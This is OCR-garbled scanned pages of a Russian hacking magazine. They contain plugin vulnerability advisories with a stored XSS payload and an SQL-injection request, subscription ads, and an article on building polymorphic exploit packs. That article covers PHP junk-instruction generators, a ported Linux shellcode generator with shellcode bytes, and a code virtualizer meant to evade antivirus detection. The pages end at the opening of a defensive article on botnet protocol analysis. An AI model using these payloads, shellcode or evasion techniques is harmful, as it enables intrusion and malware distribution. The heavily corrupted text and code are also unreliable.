АіііснпогпіСЯп - «ШІШПтяі- РСПІТГІ* - Рй**Г*й Ьу ѵВиІІ*ип ■ НіЯр ПітміЬѵг 

Т«аі ѵѵогдотег - оГС ттшптеі 





ДоркдляѵВиІІеІіп выдает оѵег 100 000 результатов 



сІоситеп1:.1:е5І:-Рогт. 5иЬші1:0 ; 

</зсгір1:> 

</ЬосІу> 

</М1:т1> 

При заходе на эту страницу пользователя с нужными пра- 
вами мы будем наблюдать изменение на строе к плагина на 
нужные нам значения, в частности переменную ѵѵрЕЬЬагІехЕ 
можно изменить на произвольный Э5, тем самым реализовав 
хранимую Х55. 

2. Хранимая Х55. Поле под названием Меззаде (переменная 
ѵѵріЬЬагІехі) скрипта ѵѵр-ІорЬаг.рбр подвержено уязвимости 
ВіогесІ Сгозз-зіІеВсгірІіпд. Переменная доступна только из 
административного меню плагина. Пример эксплуатации: 

</зсгірТ><5сгірТ>а1егТ(3)^зсгір1:> 

После сохранения в переменной данного значения скрипт 
<5сгірЬ>аІегі(3)</5сгірІ> будет выполняться на каждой странице, 
где отображается плагин. 



ТАР 6 ЕТ 5 



ѴѴогсІРге55ѴѴР-ТорВаг4.02 и, возможно, более ранние. 



Боиякж 



Обновиться до версии 4.03 или более поздней. 




БОЬ-ИНЪЕКЦИЯ БЫЛА 
НАЙДЕНА В ПЛАГИНЕ УЕТ 
АЫ0ТНЕКАѴѴАК05 5У5ТЕМ 
ИЗВЕСТНОГО ДВИЖКА 
ѴВШ.І.ЕТІМ И ПОЗВОЛЯЕТ 
ВЫПОЛНЯТЬ ПРОИЗВОЛЬНЫЕ 
50І.-ЗАПР0СЫ К БАЗЕ ДАННЫХ 



/ 50І.-инъекциявѵВиІІеІіп Ѵеі 
& АпоІІіег АѵѵагйзЗузІет 



СѴ55Ѵ2 6.0 



(АѴ: М/АС: М/Аи:5/С: Р/І: Р/А: Р] 

ЩЩ 

Дата релиза: 29 августа 2012 года 
Автор: ВаскзІйзЬ/Оап 

Соодіе Оогк: іпигкаѵѵагсІг.рЬр іпіехі/'роѵѵегесі Ьу ѵЬиІІеІіп" 

ВОБ-инъекция была найдена в плагинеУеІАпоЕЬегАѵѵагсІзБузЕет 
известного движка ѵВиІІеЛп и позволяет выполнять про из воль- 
ные ВОБ-зап росы к базе да иных приложения. 



ЕХРЮІТ 



Уяз вимость существует в скрипте /гец иез1:_аѵѵа гсі .р И р: 

$ѵЬи11е1:іп->іпри1:->с1еап_аггау_^рсГр'. аггаѵ( 
’амагсі ісі' => ТУРЕ ІЛІМТ. 

// , а^л^а^сI_^е^ие51:_пате , => ТУРЕ5ТК. 

//'аыагдгедиезТгесз.рз.еп-Епате' => ТУРЕ 5ТК. 
'амагсІ_гедие5І:_геа50п' ТУРЕ_5ТК, 
'ашагсІ_гедие5 І:_иі сГ => ТУРЕ_ІІІ\ІІТ, 

)); 



$аыагсІ_гедие5І:_иісІ = $ѵЬи11еТіп->СРС['амагсІ_гедие5І:_иісГ] ; 
$сІЬ- >диепу_ыпіТе( м ІМ5ЕКТ ІІЧТО ТАВІ_Е_РКЕРІХ . "аыагсІ_А 
педиезТз (амагсІ_гед_иісІ., амагсІ_гес_иісІ., амагсІ_гед_аісП 
зызгсі пед геазоп 1 ) ѴАШЕ5 (’ЗаыагсІгедиезІіиісГ. 
'$аі\/аг(і_гедие5І:_иісГ. '$аыагсІ [ аыагсі ісі $сІЬ->езсаре_ \ 
5^1=піп^($ѵЬи11е1=іп->^РС[ , а^л^апсI_^едие51=_пеа5оп , ] ) . ; 

Переменная $а\л/агсІ_гедиезЕ_иісІ используется в запросе без вся- 
кой фильтрации. Пример эксплуатации: 

ІтЕТр : //[зіТе] . сот/гедиезі_аыагсІ . рбр 
РОБТ : сІо=зиЬтіТ&пате=аіл/агсІ ісІ= [валидный ІР] 
&амагсІ_гедие5І:_геа5оп=0 

&аыагсІ_гедие5І:_иісІ=0[$ОІ- инъекция ]&зиЬті1:=5иЬті1: 



ТАК 6 ЕТ 5 



Уеі АпоіЬег Аѵѵагсіз Бузіет 4.02 и, возможно, более ранние. 



БОЮТІОЫ 



Исправленной версии плагина на данный момент не существует. □С 
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ПОДПИШИСЬ! 



8-800-200-3-999 

+7 (495) 663-82-77 (бесплатно) 



Редакционная подписка без посредников — это 
гарантия получения важного для Вас журнала 
и экономия до 40% от розничной цены в киоске. 







6 номеров — 1194 руб. 
12 номеров — 2149 руб. 



6 номеров — 810 руб. 

12 номеров — 1499 руб. 



6 номеров — 1110 руб. 
12 номеров — 1999 руб. 



6 номеров — 775 руб. 

12 номеров — 1399 руб. 






ОіЁНаІРІіоіо 




6 номеров — 564 руб. 

1 3 номеров — 1105 руб. 



6 номеров — 599 руб. 

1 2 номеров — 1188 руб. 



6 номеров — 1110 руб. 
12 номеров — 1999 руб. 



6 номеров — 810 руб. 

12 номеров — 1499 руб. 





3 номера — 630 руб. 

6 номеров — 1140 руб. 



6 номеров — 895 руб. 

12 номеров — 1699 руб. 



6 номеров — 690 руб. 

12 номеров — 1249 руб. 



6 номеров — 950 руб. 

12 номеров — 1699 руб. 




6 номеров — 1110 руб. 
12 номеров — 1999 руб. 



6 номеров — 1110 руб. 
12 номеров — 1999 руб. 



(дате)іамі 

зНор.дІс.ги 











взлом 



БапіагБаІзига (заІзигаЙгООіѵѵОгт.сот, ІѵѵЩег.сот/!#/5апіаг_5а*5ига] 



ПОЛИМОРФНЫМ 

ЭКСПЛОЙТ-ПАК 

НОВЫЙ ВЗГЛЯД НА ДИНАМИЧЕСКУЮ 
КОДОГЕНЕРАЦИЮ 



Эксплойт-паки занимают довольно большую нишу черного рынка, являясь 
основой прогрузов и инсталлов малвари. Но мало кто знает, насколько они 
неэффективны и какие проблемы возникают чуть ли не каждый день у де- 
велоперов специфических продуктов. Эта статья расскажет, какие ошибки 
обычно встречаются при создании эксплойт-паков и какие инновационные 
подходы помогут решить большинство проблем. 





ПОЧЕМУ ЭКСПЛОЙТ-ПАКИ НЕЭФФЕКТИВНЫ? 

Ответить на этот вопрос непросто, ведь необходимы веские аргу- 
менты. Не в обиду будь сказано девелоперам ехріоіі раск'ов, но, 
по моему мнению, на сегодняшний день не существует стоящего 
продукта, полностью удовлетворяющего потребности клиентов. 
Сейчас я объясню почему. 

1. Качество продуктов, непутатьссамимиэксплойтами, наочень 
низком у ровне — в основном из-за неграмотности их авторов. 
Часто так называемые связки страдают банальными уязвимо- 
стями (Х55, 50І_і, С5РР, еіс.), через которые идетсливтрафика, 
инсталлов и, какследствие, утечка базы данных и ботов. 

2. Большинство О-бау'ев рипаются/переписываютсятолько после 
того, как готовый эксплойт появляется в публичной эксплойт-ба- 
зе или же во фреймворке МеІазрІоіС 

3. Низкое качество «крипта» дает о себе знать — авторам прихо- 
дится каждый раз перебивать криптоалгоритм, написанный 35, 
или морфить код вручную из раза в раз. На черном рынке можно 
встретитьуслуги «чистки сплоитов, іітате, исходников», что до- 
вольно-таки забавно :). 

4. Так как в подавляющем большинстве связки написаны с исполь- 
зованием средств распространенного сейчас языка программи- 
рования РНР,а внем нехватаетузкоспециализированныхбибли- 
отек, связанных с И Б и реверс-инжинирингкодингом, возникают 
все перечисленные проблемы. 

МАТЧАСТЬ 

Я не буду заострять твое внимание на первых двух проблемах — как 
мне кажется, дело тут в знаниях, которые нужно прокачать юным 
девелоперам :]. Я покажу тебе довольно интересный подход к реше- 
нию проблем с динамическим морфом, криптом и кодогенерацией, 
вызванных отсутствием нужных библиотек в РНР. Все примеры, 
которые приводятся в статье, можно использовать и в других обла- 
стях, где требуется динамическая кодогенерация, таких как крипт- 
сервисы, динамические генераторы малвари и так далее. Но прежде 
чем мы начнем разбираться с кодом, хотелось бы уточнить значение 
терминов, которые будут применяться ниже. Дело в том, что сейчас 
настолько модно кидаться грозными словами «метаморфинг» и «по- 
лиморфинг», что сам смысл этих слов полностью утрачивается. 



Под полиморфом сейчас понимается некий дешифровщик (чуть 
лучше, чем обычный алгоритм побитового исключения ХОР], чья 
задача состоит в смене ключа и разбавлении кода мусором, кото- 
рый сам по себе не шибко-то и многообразен. Настоящий хороший 
полиморф никоим образом не является таким убогим созданием 
со случайным ключом дешифровки. Чтобы это понять, достаточно 
будет взглянуть на старые исходники МіЕ и увидеть реальный 
годный полиморф. При этом «аверы» отлюбого более-менее стоя- 
щего полиморфика сразу же бросаются в панику, потому что только 
такой морф не обнаруживает никакая сигнатура — ни плавающая 
(паттернами), ни любая другая. Существуют также и метаморфы, до 
которых всем творениям на сегодняшнем рынке, даже вместе взя- 
тым, еще очень далеко. Как правило, покупателю предоставляется 
один билд/связка, которая, конечно же, обладает «морфностью», 
но толк от этой «морфности» на практике нулевой — билд связки 
един для всех жертв, и если хоть одна из них спалит билд, связка/ 
бот будет палиться у всех клиентов. 

Отличие полиморфа от метаморфа состоит в том, что по- 
лиморф обычно просто добавляет в код мусорные инструкции, 
чтобы затруднить дизассемблирование и анализ кода. Метаморф 
старается целиком изменить вид кода, сохраняя при этом ориги- 
нальный алгоритм его работы, для чего он заменяет инструкции 
их синонимами, состоящими, в свою очередь, из одной или не- 
скольких других инструкций. Большая часть полученного нового 
кода, производимого метаморфом, обычно нужна для работы 
программы, доля мусорного кода у него весьма мала. У полимор- 
фа как раз таки все наоборот. Поэтому декодировать мета морф 
гораздо сложнее. 

Двигателем любого метаморфного механизма является дизас- 
семблер. Именно с его помощью происходит логическое и морфо- 
логическое разбиение подаваемого на вход кода, после чего, как 
уже говорилось выше, все инструкции заменяются на аналогичные 
по работе небольшие куски кода. Причем замена может произво- 
диться в несколько итераций. Число итераций (циклов замены) 
морфера называется глубиной морфинга. Чем она больше, тем бо- 
лее запутанным будет выходной код. После морфинга инструкции 
компилируются обратно в машинный код. Большинство авторов 
метаморфов считают, что большая глубина морфинга должна 
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Полиморфный эксплойт-пак 




Аренда никудышной связки в год по «доступным» ценам 



существенно осложнить анализ кода, но опыт реверсеров говорит 
об обратном. 

Сложность декодирования метаморфа целиком зависит от 
первичного алгоритма морфера и оттого, сколько комбинаций 
инструкций он способен выдать на одну оригинальную инструк- 
цию. Увеличение же числа этих комбинаций повышением глубины 
морфинга ничего хорошего не дает: все равно после написания 
анализатора можно будет снять метаморф в несколько проходов 
также, какой и накладывался. 

Более продвинутой технологией метаморфинга можно на- 
звать пермутацию. Преимущество пермутации перед метамор- 
фом в том, что метаморфизм — это простейшая генерация кода, 
собирающаяся из описывающих его структур (в которой шаблон 
для сборки жестко зашит в самом коде), тогда как для пермута- 
ции никакой псевдокод не нужен: выполняется дизассемблиро- 
вание кода, рекомпиляция (перестройка) и конечная компиляция 
(сборка). 

Но как быть с РНР? Изначально это не системный язык про- 
граммирования, так что о манипуляции с низкоуровневыми 
операциями и данными можно забыть, а еще проще опустить руки 
и вообще ничего не делать (как раз это ты можешь сегодня наблю- 
дать на черном рынке). 

Сдаются слабаки, а мы с тобой постараемся рассмотреть не- 
сколько интересных концептов, которые могут принести немалое 
количество профита :). Первым делом я бы хотел пойти снизу вверх 
и рассмотреть простейший трэш-генератор. 

Идея написания полиморфного трэш-генератора на РНР 
родилась у моего знакомого Сгеат'а (ШоколадныйКрем, привед!). 
Суть его идеи — универсальная генерация 32-битных мусорных 
инструкций для архитектуры х86: 

• генерация инструкций без операндов; 

• генерация ненужных инструкций; 

• генерация инструкций с одним операндом; 

• генерация инструкций с двумя операндами. 

Приведу несколько функций «мусорогенерации» из этого 
движка: 

1. Инструкциисоднимоперандом 

■Рипсіііоп опе_орегапсІ($питЬег) { 

$соттапсІ5 = аггау("Ь5ыар" л "сІесѴ "іпс", "тиі". м пе%". \ 
"поС іі 

$ге|Е[5 32 = аггауГ'еах". "есх". "есіх". "еЬх". "еБІ". \ 

"есіі") 



Тог( $і=Ѳ; $і<$питЬег ; $і++) { 

$соип1:_с = папсІ(0 л соип1:($соттапсІ5)-1); 
$соип 1=_г = гапсІ(Ѳ л соип1:($ге§5_32) -1) ; 
$такеир .= $соттапсІ5[$соип1=_с] . " ". \ 
$ге^5 32[$соип1= г]. \ "\г\п"; 

} 



!№ » іЬтгНі- Н«^|ірн^гч^|Ьі^і|Іцй 

,В ) 
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'ИиЕіиіГЬ^ "■ ■■■■іГІ «ііі 1' Аіи; ’іЪиті'.» .іД^п 

ѵ.Ѵ.ш.ям іи^-чо ЩЛ ||к[Ш> іт 

І.І.РГ.Г НК4«— -'ѴП *.*.-И.*-»і:іГГрг— іЛЧ 
МЛСШГШ»!* 

I Г1ІІІ I РЖМІІЯГМГМІІі 
1Г<к№> Іі.і.Т*,! КГЫГі-Н 

-■ дет#іу пиц 

Ы|. І^ЩНОНН!. .тЬ-ч*г 
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>■ №Г)Р№тьнііЛР>|і-|іі-ккт:ч;іМ7.‘Р« >ГГ*и«3 

шииліпімгші^ііигі р г і і Ь нн ■ 1МЦМММ МЛМЦ|ДДЦДМ Д1ШИЩ Щ 
іш***мщ ■ г^кКггДія)^НРідИ ?. НС- 

*і, г* 

РНР ■ ІѵСМАГнНП, 4* ІПШСйІ І7ІГ РП 



Пример декриптованного хардкода из той же связки 



есб о $такеир; 



2. Трэш-генератордляинструкцийсоднимоперандом. 

■РипсЬіоп 1:га5Іі_орегапсІ($питЬег) { 

$соттапсІ5 = аггауС "асіс" . "асИ". "бііЬ". "апсГ. "стр". \ 
"тоѵ" л "ог", "ІіеБІ:" . "хог"., "бЬЬ"); 

$гѳ§б_ 32 = аггауГ'еах". "есх". "есіх". "еЬх". "езі". \ 

"есіі") ; 



Тог ($і=Ѳ; $і<$питЬег\^$і++) { 

$соип1= с = гапсІ(Ѳ. соип1=( , $соттапсІ5’)-1') ; 

$соип1= г = гапсІ/Ѳ. соипІі^ге^Б 32)-1Ѵ. 

$соип1:_г2 = гапсІ(1. 99999999); 

$такеир .= $соттапсІ5[$соип1: с]. \ 

1 " . $пе§5_32[$соип1:_п] . " } _|\$соип1:_г2. ^\г\п'С; 

} 

есбо $такеир; 

На диске ты можешь найти полный исходник этого движка (зге/ 
сЬосоІд.рЬр). 

СКАЖЕМ ХАРДКОДУ НЕТ! 

ДИНАМИЧЕСКИЙ КОДОГЕНЕРАТОР 

Просмотрев добрый десяток «лучших элитных» сплоит-паков на чер- 
ном рынке, я был крайне огорчен их качеством, и в первую очередь 
хардкодом (что, собственно, приводит к постоянным детектам и руч- 
ным чисткам), который присутствует практически во всех связках. 

Конечно же, я не удивлен тем, что девелоперы бесконечно кру- 
тят педали и сталкиваются с новыми проблемами, но все же такая 
бестолковость заставила меня написать библиотеку динамической 
кодогенерации на РНР. Суть библиотеки в том, что она без труда 
позволяет «инлайнить» ассемблерные вставки (х86) прямо в РНР, 
как это делается в системных языках программирования. Текущая 
реализация 0.0.1 еще сырая и незавершенная, но уже позволяет 
сделать многое. В ней присутствует практически полноценная 
работа с 8/16/32-битными регистрами, ветвлениями Зхх, работа с 
исключениями и прерываниями, базовые и логические операции и 
так далее. 

Векторы, в которых может применяться эта библиотека, не 
ограничиваются сплоит-паками — возможности динамической 
кодогенерации довольно велики, и применение ей можно найти 
весьма широкое: 

• низкоуровневые приложения; 

• эмуляторы кода, ѴМ; 
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Детект ІЛЬТІРР РРР эксплойта 18/43 




0<ѵігиБІоіаІ 
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Курьезный случай после обработки сплоита ѴМ-криптором: 

сбив сигнатуры + коллизия «криптографически устойчивого» алгоритма 5НА-256 



• крэкми, кейгенераторы; 

• драйверы; 

• низкоуровневая криптография, етц. 

Давай рассмотрим простейший пример использования этой 
библиотеки. В качестве примера приведу перенос ВІаскЫдЫ'з 
зЬеІІсосІе депегаіог Іюг Ыпих х86. Вот оригинальный код генера- 
тора: 



сЬаг сос!е[] = 



"\\х60" 


/*ри5Ііа*/ 


"\\х31\\хс0" 


/*хог 


%еах.%еах*/ 


!^х31\\хгіГ: 


/*хог 


%есІх.%есІх*/ 


"\\хЬ0\\х0Ь" 


/*тоѵ 


$ѲхЬ,%а1*/ 


"\\х52" 


/*ризІі 


%ес!х*/ 


"\\хб8\\хбе\\х2-р\\х73\\хб8" 


/*ривІі 


$0х68732-Рбе*/ 


"\\хб8\\х2-р\\х2-р\\хб2\\хб9" 


/*ривІі 


$0х69б22-Р2-Р*/ 


"\Хх89\\хеЗ" 


/*тоѵ 


%езр .%еЬх*/ 


"\\х52" 


/*ривІі 


%ес!х*/ 


"Х\хб8\\х2с1\\хб3\\хб3\\х63" 


/*ривІі 


$0х6363632сІ*/ 


"\\х89\\хе1" 


/*тоѵ 


%евр.%есх*/ 


"\\Х52" 


/*ри5Іі 


%ес!х*/ 


"Х\хеЬ\\х07" 


/*ітр 


804839а <стсІ>*/ 



"\\х 51" /*ризІі %есх*/ 

"\\х53" /*ри5Іі %еЬх*/ 



"\\х89\\хе1" 


/*тоѵ 


%езр.%есх*/ 


"ХХхссІХХхЗѲ" 


/*іп1: 


$0x80^/ 


"\\Х61" 


/*рора* 


/ 


"ХХхеВХХхтХх-Р-РХХх-Р-РХХх-Р-Р" 


/*са11 


8048393 <11>*/ ; 



Перенос не должен составить труда, так как моя библиотека 
идет вкупе с хорошей и понятной документацией, которая должна 
помочь решить практические проблемы с переносом любого кода. 

Іпс1ис1е( 1 рМрсосІе§еп_1±Ь . рМр ' ); 

-Рипсіііоп 1іпих_5Ііе11сосІе^еп_пи11_-РгееО{ 

РЦ5НАП; 

ХОК_КЕС(ЕАХ, ЕАХ) ; 

ХОК_КЕС(ЕйХд ЕйХ) ; 

МОѴ_В(АІ_, ' ѲВ ' ); 

РІІ5Н_КЕС( ЕЭХ) ; 

РЦ5Н Ь ( 1 68732-Рбе 1 ^ ; 

РЦ5Н_и , 69622-Р2-Р' V. 

МОѴ_КЕС(Е5Р,ЕВХ); 

РІІ5Н_КЕС( ЕЭХ) ; 

РЦІБН и( ' 6363632с! ' ) ; 

МОѴ_КЕб(Е5Р,ЕСХ); 

РІІ5Н_КЕС( ЕЭХ) ; 

ЗМР_и ' 080483 9а' V. 



РІІ5Н_КЕС( ЕСХ^ 

РІІ5Н_КЕС( ЕВХ) ; 

МОУ КЕ(з(Е5Р. ЕСХ) ; 
ІІЧТСбѲ'); 

РОРА() : 

САИ_ѴАРІ( ' -Р-Р-Р-Р-Р-Р-Р4 ' ) ; 



_пеіипп_( $ г е в и 11: ) і 



1іпих_5Ііе11сосІе%еп_пи11_-Ргее($ге5и11:^ ; 

Разбор кода таков: вначале мы подключаем нашу библиотеку 
функцией іпсЫе('рЬрсобедеп_ІіЬ.рІ~ір'), далее создаем функцию 
кодогенерации Ііпих_5ЬеІІсосІедеп_пиІІ_1тее(), в которой возвра- 
щается переменная $ге5иК, ну и вызываем нашу функцию, чтобы 
проверить результат. На выходе мы должны получить следующий 
сгенерированный код: 



\х60\х31\хс0\х31\хсІ2\хЬ0\х52\х68\х6е\х2-р\х73\х68\х68\х2-р\ 

Х2-Р\х62\хб9\х89\хе3\х52\х68\х2с1\хб3\х63\х63\х89\хе1\х52\ 

хе9\х9а\х83\х04\х08\х51\х53\х89\хе1\хссІ\х8Ѳ\х61\хе8\х-Р4\ 

х-Р-РХх-Р-РХх-Р-Р 

Как видишь из примеров, ничего сложного в переносе нет, а 
самое главное — теперь появляется возможность манипулировать 
с низкоуровневым кодом и данными, что в РНР само по себе, со- 
гласись, инновация. 



МОРФИНГ НАУРОВНЕ ОПКОДОВ Х86 

Мы с тобой уже рассмотрели пример мусорогенерации с использо- 
ванием трэш-генератора СгеаітГа. Этот генератор имеет несколько 
неприятных недостатков, из которых автор должен будет сделать 
выводы на будущее: 

• первый существенный недостаток — это работа только с 32-раз- 
рядными регистрами; 

• второй — для мусорогенерации нужны исходники эксплойта/ 
приложения на МА5М (ѵѵіпсіоѵѵз) — это менее важно, но всеже 
сказывается на актуальности генератора. 

Из этих недостатков вытекает проблема статичности, что, 
конечно, создает много неудобств. Решить эту проблему нужно и 
даже можно с использованием библиотеки динамической кодоге- 
нерации рЬрсобедеп. Перенесем следующий пример ГСЧ (генера- 
тор случайных чисел) из полиморфного движка гОтЫе: 



ргосезБ гапсізеесі: 


тоѵ 


еах. 


гапсізеесі 




ітиі 


еах. 


214013 




асісі 


еах. 


2531011 
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Полиморфный эксплойт-пак 



тоѵ еах, гапсізеесі 
сіес гапсісоипі: 

дг ехіі 

^еігпсІпитЬег : ризИ есх 

ризЬ есіх 



с аіі ргосе55_гапсІ5еесІ 





стр 


есх, 65536 


: необходимо 




— З'Ь 


тиі 


: только 


сііѵ: 


хог 


есіх, есіх 


; если 




СІІѴ 


есх 


; ЕСХ 




ХСІ1§ 


есіх, еах 


: бывает 




з'тр 


ехіі: 


: >= 65536 


тиі: 


бЬг 


еах, 16 






ітиі 


еах, есх 






БЬг 


еах, 16 




ехіі: : 


рор 


есіх 






рор 


есх 




геіп 



Сказано — сделано: 



Іпс1ис1е( ' рЬрсос1е§еп_НЬ . рИр ' ) ; 



іипсііоп СКІ\І($гапсІ5еесІ, $гапсІсоип1:){ 
#рпосе55_гапсІ5еесІ : 

М0Ѵ_І_('ЕАХ',$гапсІ5еесІ); 
ШЛ_('ЕАХ', 214013); 
АОО_КЕС('ЕАХ' , 2531011); 
М0ѴКЕ6ГЕАХ'. $гапсІ5еесП ; 
0ЕС_ѴАКІ_($гапсІсоип1:); 
32($ехі1=) ; 



#§еі_гпсІ_питЬег : 

РЦ5Н КЕбГЕСХ') ; 



Ри5Н_КЕ6('Е0Х'); 

САН $ргосе55_гапсІ5еесІ; 
СМР_Ц'ЕСХ'. 65536): 
ЗВ($ти1) : 



# сііѵ: 

ХОК_КЕе('ЕОХ', 'ЕйХ') ; 

ОІѴ_КЕС(ЕСХ) 

ХСНС('ЕОХ', 'ЕАХ') ; 

ЗМР($ехіі) ; 

# тиі : 

5НК('ЕАХ', 16); 

ІМІЛ_('ЕАХ', 'ЕСХ'); 

5НК('ЕАХ',16); 

# ех іі: 

РОРКЕбГЕРХ'Ѵ. 

РОР_КЕС('ЕСХ'Х; 

КЕТМ(); 

} 

Как видишь, эффективность библиотеки налицо, перевод 
исходного алгоритма занял не более трех минут, что действи- 
тельно впечатляет. Примеры использования и порта эксплойтов с 
применением возможностей этой библиотеки ты можешь найти на 
официальной страничке проекта (ссылку ищи на врезках). 

ЗАКЛЮЧЕНИЕ 

Хотелось бы отметить, что все эти идеи и концепты находятся 
в зачаточном состоянии, идеи и библиотеки очень сыры. Проект 
рЬрсобедеп ІіЬгагу открыт для всехжелающих принять участие 
в его развитии. Именно ты, мой друг, можешь повлиять на даль- 
нейшую судьбу развития проекта и науки кодогенерации в целом, 
именно в твоих руках поменять ход истории автоматизации задач 
эксплойтостроения! Да пребудет с тобой сила ѵх! ІЗЕ 



ѴѴАКЫШС 



КОНЦЕПТУАЛЬНЫЙ ЭКСПЛОЙТ В ѴМ 




Вся информация 

предоставлена 

исключительно 


По идее, так как мы имеем на руках готовую библиотеку для 


І_ОР5Р( ) ; 


™ в ознакомительных 

целях. 

Ни редакция, 


низкоуровневой манипуляции кодом и данными, есть возмож- 


РІІ5Н КЕС('ЕАХ'); 


ни автор не несут 
ответственности 


ность написать и такие довольно сложные вещи, как ѴМ, за- 


ѵт іеісЬ(); 


за любой возможный 


дача которой — затруднять анализ кода а вера ми. Простейший 


} 


вред, причиненный 


виртуализатор кода: 




материалами данной 
статьи. 


оиЬІіс іипсііоп саіі ЬапсІІегО-Г 




СІЭ55 УМ 


І_ОР5Р(); 




1 


САН КЕС( ' ЕАХ ' ) ; 




риЬІіс іипсііоп соп5ігисі($сІаіа , $ѵс ѵа){ 


ѵт іеісЬ(); 


• Статья М5-КЕМ'а на 


$іЬіб-> сІаіа=$сІаіа; 


} 


тему полиморфных 


$іЬіб-> ѵсѵа=$ѵс ѵа; 




крипторов: Ьіііу/ 
Оіпеѵі: 

• статьи гОтЬіе на 


} 






с Іа в 5 ѴтСосІе 


тему метаморфов, 


риЬІіс іипсііоп ѵт 5іагі($ѵс ѵа){ 


{ 


полиморфов и 
пермутации: Ьіі. 


МОѴ 1_( ' Е5І ' , $ѵс ѵа); 


риЬІіс зіаііс іипсііоп ѵігіиа1І5е($сІаіа , \ 


Іѵ/0МхРсІ6. ьГЕ 


} 


$ѵс ѵа=пи11) 


Іѵ/КІ_к9г11 ЬіІ.Іѵ/ 

ПО\А/ТП П. 


риЬІіс іипсііоп ѵт іеісЬ(){ 




коѵѵТВк: 

• страница проекта 


ХОК_КЕС( 'ЕАХ' , 'ЕАХ'); 


геіигп пе\ді ѴМ($сІаіа,$ѵс ѵа); 


РНР Сосіедеп ЫЬгагу: 


І_ОАР5В( ) ; 


} 


ЬііІѵ/КА5оѵе: 

* большой 


РІІ5НА( ) ; 




архив сэмплов 


ХОК КЕС( ' ЕСХ ' , ЕСХ) ; 




И ИСХОДНИКОВ 


ЭМР КЕС('ЕОІ'); 


Итого за пять минут имеем простейший виртуализатор 


генераторов: ух^ 

агсЫѵ.аІ: 


} 


эксплойта, который курьезным образом, кроме того что 


• проект Е0Р:еоі- 




сбил детект, еще и произвел атаку типа коллизии на 


ргоіесі.пеі. 


риЬІіс іипсііоп ривЬ_ЬапсІ1ег(){ 


криптографический алгоритм 5НА-256 :). 
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РЕВЕРС-ИНЖИНИРИНГ 
И СИМУЛЯЦИЯ 
ПРОТОКОЛА БОТНЕТА 
С ПОМОЩЬЮ ЫЕТ20В 

Любой исследователь сталкивается 
с трудностями при реверс-инжиниринге 
и рано или поздно приходит к выводу: 
необходим инструмент, который бы упростил 
решение многих задач. В течение двух лет мы 
занимались созданием ПО, которое упрощает 
манипуляции с бинарными потоками, находит 
соотношения между элементами, определяет 
формат данных, выявляет синтаксис и делает 
множество других полезных мелочей. 



ВВЕДЕНИЕ 

Специалистам приходится сталкиваться с реверс-инжинирингом 
для решения самых разнообразных задач. Например, кому-то 
хочется понять, как функционирует их любимый магазин игр, 
а кому-то нужно подключить какое-нибудь ІІ5В-устройство в не- 
поддерживаемой ОС. Но нельзя забывать и про специалистов по 
аудиту безопасности, которым также часто приходится прибегать 
к реверс-инжинирингу в своей работе. В данной статье мы сфоку- 
сируемся именно на их нуждах. 

В последние годы для анализа безопасности стали популярны 
методы и инструменты, основанные на фаззинге. По сравнению 
с традиционными подходами (статический и динамический анализ 
бинарников в связке с анализом исходников), требовавшими 
определенных навыков, а также большого количества ресурсов 
и времени, новые инструменты предлагают много преимуществ: 
сравнительную простоту реализации, полуавтоматический прин- 
цип работы, быстрое получение результата и так далее. Несмотря 
на это, опыт показывает, что для максимальной эффективности 
анализ с применением фаззинга требует хорошего знания иссле- 
дуемой системы и ее протоколов коммуникации. По этой причине 
работа с проприетарными или недокументированными протокола- 
ми оказывается менее эффективной. 

С другой стороны, при анализе файрволов или систем обнару- 
жения сетевых атак (N105) исследователю часто требуется сгене- 
рировать реалистичный трафик для того, чтобы оценить надеж- 
ность и релевантность продукта (процент ложных срабатываний). 
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Вскрытие ботнета 
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Рис. 1. Формат С&С-команд50ВоІ. Первая строка описывает формат символа. 

Вторая строка описывает формы визуализации 

Часто это бывает непросто, поскольку требуется полный контроль 
над выдаваемым трафиком. Отсюда вытекает, что исследователь 
не сможет нагенерировать полезный трафик, если он не имеет 
доступа к спецификации протокола. Для решения таких проблем 
с помощью реверсивной инженерии протоколов и был разработан 
ІЧеІгоЬ. С его помощью специалист сможет сэкономить время, 
необходимое для анализа, а также получить более глубокое по- 
нимание исследуемого протокола. 

СЛОВАРЬ ПРОТОКОЛА 

В своей работе ІЧеІгоЬ использует словарь в виде ряда символов. 
Символ — это абстрактное представление группы похожих кон- 
струкций, что отражает следующую предпосылку: схожие сообще- 
ния, скорее всего, имеют схожую функцию в протоколе. Например, 
группа флагов ТСР 5ѴІ\І может быть обозначена одним символом, 
а запросы ІСМР ЕСНО РЕСІІІЕ5Т или 5МТР ЕН1_0 — другим. 

Структура символа определяется типами данных, принимаемых 
теми или иными командами (например, сегменты ТСР содержатта- 
кие поля, как последовательность чисел или контрольная сумма]. 
Длина полей может быть как фиксированной, так и произвольной. 
Поле может включать в себя подэлементы (такие как область по- 
лезной нагрузки). Поэтому, если рассматривать слой протокола как 
просто еще одно поле, можно восстановить стек протокола (напри- 
мер, ТСР, инкапсулированный в ІР, сам инкапсулирован в ЕіЬегпеі), 
определив собственный словарь и грамматику для каждого слоя. 
Определив структуру полей, мы можем задать формат символов. 

В нашей модели у поля есть различные характеристики: неко- 
торые из них присущи всем полям, а некоторые релевантны только 
для конкретного типа поля и важны только с целью визуализации. 
Область допустимых значений поля формулируется с помощью 
дизъюнктивной нормальной формы. Кроме того, у областей есть 
некоторые свойства интерпретации, важные для визуализации 
и поиска данных. Мы связываем содержание поля с размером 
условной единицы (размер составных элементов, образующих 
поле, таких как бит, полубайт, слово), порядком байтов, знаком и 
системой счисления (десятичная, восьмеричная, шестнадцатерич- 
ная, А5СІІ, йЕР и так далее). Кроме того, поле может определять, 
например, ІР-адрес, ІІРІ_ и прочее. Рис. 1 демонстрирует различ- 
ные форматы и формы визуализации С&С-запросов ботнета 50ВоЕ 

ГРАММАТИКА ПРОТОКОЛА 

Грамматика определяет порядок сообщений, передаваемых 
в процессе коммуникации. Например, в случае с протоколом ІСМР 
грамматика включает правило, по которому ІСМР ЕСНО РЕРІ_Ѵ 
ТУРЕ 8 всегда следует за ІСМР ЕСНО РЕ01ІЕ5Т ТУРЕ 8. Другой при- 
мер грамматики — свод правил, описывающий последователь- 
ности символов, которыми обмениваются участники ТСР-сессии. 
Эти правила могут быть представлены в виде схем, определяющих 
состояния и символы, посланные и полученные при каждой смене 
состояния (см. пример на рис. 2). 

В ЫеІгоЬ грамматика представляется в виде нашей собствен- 
ной математической модели. Это расширение традиционного 
автомата Мили позволяет иметь множество выходных символов 
для одного и того же перехода, что дает возможность зафиксиро- 




вать несколько ответов на одну и туже команду. В нашей модели 
